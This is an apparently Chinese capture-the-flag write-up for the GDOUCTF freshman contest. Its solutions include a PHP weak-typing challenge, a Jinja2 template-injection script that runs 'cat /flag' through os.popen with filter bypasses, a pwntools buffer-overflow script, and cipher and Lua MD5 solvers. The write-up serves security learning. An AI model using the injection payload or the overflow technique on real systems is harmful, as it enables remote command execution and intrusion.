GDOUCTF 新生赛 wp
GDOUCTF 新生赛 wp
yulate
发布于 2023-05-09 11:28:56
发布于 2023-05-09 11:28:56
最终成绩
一个人打了一天,web太过简单了,AK 加起来没有misc一题分高,其他方向就浅浅会一点,最后就拿了个115名。
file
WEB
受不了一点
老旧的php弱类型考点
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if (isset($_POST['gdou']) && isset($_POST['ctf'])) {
$b = $_POST['ctf'];
$a = $_POST['gdou'];
if ($_POST['gdou'] != $_POST['ctf'] && md5($a) === md5($b)) {
if (isset($_COOKIE['cookie'])) {
if ($_COOKIE['cookie'] == 'j0k3r') {
if (isset($_GET['aaa']) && isset($_GET['bbb'])) {
$aaa = $_GET['aaa'];
$bbb = $_GET['bbb'];
if ($aaa == 114514 && $bbb == 114514 && $aaa != $bbb) {
$give = 'cancanwordflag';
$get = 'hacker!';
if (!isset($_GET['flag']) && !isset($_POST['flag'])) {
die($give);
}
if ($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag') {
die($get);
}
foreach ($_POST as $key => $value) {
$$key = $value;
}
foreach ($_GET as $key => $value) {
$$key = $$value;
}
echo $f1ag;
} else {
echo "洗洗睡吧";
}
} else {
echo "行不行啊细狗";
}
}
} else {
echo '菜菜';
}
} else {
echo "就这?";
}
} else {
echo "别来沾边";
}
?>
file
hate eat snake
日到墙上之后提示点击取消,然后等着60秒就行了
file
EZ WEB
PUT请求/super-secret-route-nobody-will-guess路由即可拿到flag
file
一道flask jinja2模板注入题,过滤了.和_,attr取反绕过即可
import requests
url = "http://node6.anna.nssctf.cn:28986/get_flag"
def getstr(s1):
i1 = ""
s5 = ""
for i in s1:
i1 += "i~"
s5 += str(ord(i)) + ","
i1 = i1.strip("~")
s5 = s5.strip(",")
s = f"(({i1})%({s5}))"
return s
payload2 = """{% for i in ( ((g|lower|list|first|urlencode|first)~(g|lower|list|first|urlencode|last|lower)),) %}{% print ( """ + f"""lipsum|attr({getstr("__globals__")})|attr({getstr("__getitem__")})({getstr("os")})|attr({getstr("popen")})({getstr("cat /flag")})|attr({getstr("read")})()""" + """ ) %}{% endfor %}"""
data = {"name": payload2}
resp = requests.post(url=url, data=data)
print(resp.text)PWN
EASY PWN
file
在这个特定的代码中,要想确保一定执行到print_flag()函数,可以通过覆盖s1数组来实现。具体来说,由于s1数组在栈上分配的位置是在buf数组的下方,因此可以通过输入比s1数组的大小大得多的字符串来溢出s1数组,从而覆盖buf和v5变量,使得程序执行到print_flag()函数。
from pwn import *
#p = process('./easypwn')
p = remote('node5.anna.nssctf.cn', 28202)
p.recvuntil('Password:')
p.sendline('A'*30) # Overflow s1 to overwrite buf and v5 variables
print(p.recvall().decode())在接收到"Password:"提示后,我们将s1数组的大小设置为30,输入一个超过其大小的字符串"A" * 30,从而覆盖buf和v5变量,使得程序执行到print_flag()函数。最后,使用recvall()方法读取程序输出并将其打印到控制台上。
file
Crypto
Encryptor
js加密代码如下
let messagetoEncrypt = prompt("Enter a string: ").toLowerCase();
let charArray = messagetoEncrypt.split("");
let encryptedString = "";
let hasInvalidCharacter = false;
for (let i = 0; i < charArray.length; i++) {
switch (charArray[i]) {
case 'a':
encryptedString = encryptedString.concat('!')
break;
case 'b':
encryptedString = encryptedString.concat('1')
break;
case 'c':
encryptedString = encryptedString.concat(')')
break;
case 'd':
encryptedString = encryptedString.concat('v')
break;
case 'e':
encryptedString = encryptedString.concat('m')
break;
case 'f':
encryptedString = encryptedString.concat('+')
break;
case 'g':
encryptedString = encryptedString.concat('q')
break;
case 'h':
encryptedString = encryptedString.concat('0')
break;
case 'i':
encryptedString = encryptedString.concat('c')
break;
case 'j':
encryptedString = encryptedString.concat(']')
break;
case 'k':
encryptedString = encryptedString.concat('(')
break;
case 'l':
encryptedString = encryptedString.concat('}')
break;
case 'm':
encryptedString = encryptedString.concat('[')
break;
case 'n':
encryptedString = encryptedString.concat('8')
break;
case 'o':
encryptedString = encryptedString.concat('5')
break;
case 'p':
encryptedString = encryptedString.concat('$')
break;
case 'q':
encryptedString = encryptedString.concat('*')
break;
case 'r':
encryptedString = encryptedString.concat('i')
break;
case 's':
encryptedString = encryptedString.concat('>')
break;
case 't':
encryptedString = encryptedString.concat('#')
break;
case 'u':
encryptedString = encryptedString.concat('<')
break;
case 'v':
encryptedString = encryptedString.concat('?')
break;
case 'w':
encryptedString = encryptedString.concat('o')
break;
case 'x':
encryptedString = encryptedString.concat('^')
break;
case 'y':
encryptedString = encryptedString.concat('-')
break;
case 'z':
encryptedString = encryptedString.concat('_')
break;
case '0':
encryptedString = encryptedString.concat('h')
break;
case '1':
encryptedString = encryptedString.concat('w')
break;
case '2':
encryptedString = encryptedString.concat('e')
break;
case '3':
encryptedString = encryptedString.concat('9')
break;
case '4':
encryptedString = encryptedString.concat('g')
break;
case '5':
encryptedString = encryptedString.concat('z')
break;
case '6':
encryptedString = encryptedString.concat('d')
break;
case '7':
encryptedString = encryptedString.concat('~')
break;
case '8':
encryptedString = encryptedString.concat('=')
break;
case '9':
encryptedString = encryptedString.concat('x')
break;
case '!':
encryptedString = encryptedString.concat('j')
break;
case '@':
encryptedString = encryptedString.concat(':')
break;
case '#':
encryptedString = encryptedString.concat('4')
break;
case '$':
encryptedString = encryptedString.concat('b')
break;
case '%':
encryptedString = encryptedString.concat('`')
break;
case '^':
encryptedString = encryptedString.concat('l')
break;
case '&':
encryptedString = encryptedString.concat('3')
break;
case '*':
encryptedString = encryptedString.concat('t')
break;
case '(':
encryptedString = encryptedString.concat('6')
break;
case ')':
encryptedString = encryptedString.concat('s')
break;
case '_':
encryptedString = encryptedString.concat('n')
break;
case '+':
encryptedString = encryptedString.concat(';')
break;
case '-':
encryptedString = encryptedString.concat('\'')
break;
case '=':
encryptedString = encryptedString.concat('r')
break;
case '`':
encryptedString = encryptedString.concat('k')
break;
case '~':
encryptedString = encryptedString.concat('p')
break;
case '{':
encryptedString = encryptedString.concat('\"')
break;
case '}':
encryptedString = encryptedString.concat('&')
break;
case '[':
encryptedString = encryptedString.concat('/')
break;
case ']':
encryptedString = encryptedString.concat('\\')
break;
case '|':
encryptedString = encryptedString.concat('2')
break;
case ':':
encryptedString = encryptedString.concat('.')
break;
case ';':
encryptedString = encryptedString.concat('%')
break;
case '\"':
encryptedString = encryptedString.concat('|')
break;
case '\'':
encryptedString = encryptedString.concat(',')
break;
case '<':
encryptedString = encryptedString.concat('@')
break;
case '>':
encryptedString = encryptedString.concat('{')
break;
case ',':
encryptedString = encryptedString.concat('u')
break;
case '.':
encryptedString = encryptedString.concat('7')
break;
case '?':
encryptedString = encryptedString.concat('y')
break;
case '/':
encryptedString = encryptedString.concat('a')
break;
default:
hasInvalidCharacter = true;
}
}
if (hasInvalidCharacter) {
encryptedString = "Invalid String!";
} else {
console.log(`Your encoded string is ${encryptedString}`);
}Alice用脚本向Bob发送了以下消息。 这是用JS写的。 Bob对JS一无所知。 你能帮忙看看留言吗?
+}!q")hiim)#}-nvm)i-$#mvn#0mnbm)im#n+}!qnm8)i-$#mvnoc#0nz<$9inm!>-n1:1-nm8)i-$~c58n!}qhij#0[noic##m8nc8n?!8c}w!n]>&解密payload
enc = {}
def substrings(st):
s = st.split("'")
for i in range(1, len(s), 2):
return s[i]
with open("./Encryptor.js", "r") as f:
for line in f:
if "case" in line:
next_line = next(f, None)
enc[substrings(next_line.replace("\\", ""))] = substrings(line.replace("\\", ""))
print(enc)
js = """+}!q")hiim)#}-nvm)i-$#mvn#0mnbm)im#n+}!qnm8)i-$#mvnoc#0nz<$9inm!>-n1:1-nm8)i-$~c58n!}qhij#0[noic##m8nc8n?!8c}w!n]>&"""
result = ""
for i in js:
print(i)
result += enc.get(i, "")
print(result)
file
babylua
local flag = '' --这里是你要逆推出的flag
local md5 = require("md5")
-- 随机种子
math.randomseed(os.time())
local function randomStr(len)
local rankStr = ""
local randNum = 0
for i = 1, len do
randNum = math.random(1, 2)
if randNum == 1 then
rankStr = rankStr .. string.char(math.random(65, 90))
elseif randNum == 2 then
rankStr = rankStr .. string.char(math.random(97, 122))
end
end
return rankStr
end
local seed = randomStr(4)
local key = md5.sumhexa(md5.sumhexa(seed))
print(key:sub(1,10))
secret = {}
for i = 1, #flag do
secret[i] = string.byte(flag:sub(i,i)) + string.byte(key:sub(i,i))
end
for i, v in ipairs(secret) do
io.write(v, ' ')
end
print()
--程序运行输出结果:
--b5e62abe84
--200 161 198 157 173 169 199 150 105 163 193 175 173 194 135 131 135 225
--请你分析代码,逆向推出flag一道lua题,先随机一个四位大小写的字符串MD5编码两次作为key,再将flag的ASCII每一位和key的ASCII对应位值相加,写个python脚本逆向一下即可
import hashlib
target = "b5e62abe84" # 要破解的目标MD5值前10位
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
print(len("b5e62abe84bc8afbfd97c91a15aa0867"))
key = "b5e62abe84bc8afbfd97c91a15aa0867"
base_ascii = [200, 161, 198, 157, 173, 169, 199, 150, 105, 163, 193, 175, 173, 194, 135, 131, 135, 225]
key_ascii = [98, 53, 101, 54, 50, 97, 98, 101, 56, 52, 98, 99, 56, 97, 102, 98, 102, 100]
def get_key():
for i in letters:
for g in letters:
for k in letters:
for l in letters:
seed = i + g + k + l
key = hashlib.md5(hashlib.md5(seed.encode()).hexdigest().encode()).hexdigest()[
:10] # 将结果转换为 bytes 类型
if key == target:
print("seed :" + hashlib.md5(hashlib.md5(seed.encode()).hexdigest().encode()).hexdigest())
break
def get_ascii():
ascii_key = [ord(chr) for chr in key[:len(base_ascii)]]
print(ascii_key)
get_ascii()
result = [base_ascii[i] - key_ascii[i] for i in range(len(base_ascii))]
print(result)
result = [chr(i) for i in [102, 108, 97, 103, 123, 72, 101, 49, 49, 111, 95, 76, 117, 97, 33, 33, 33, 125]]
print(''.join(result))
file
浏览量: 1
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-5-06 0,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录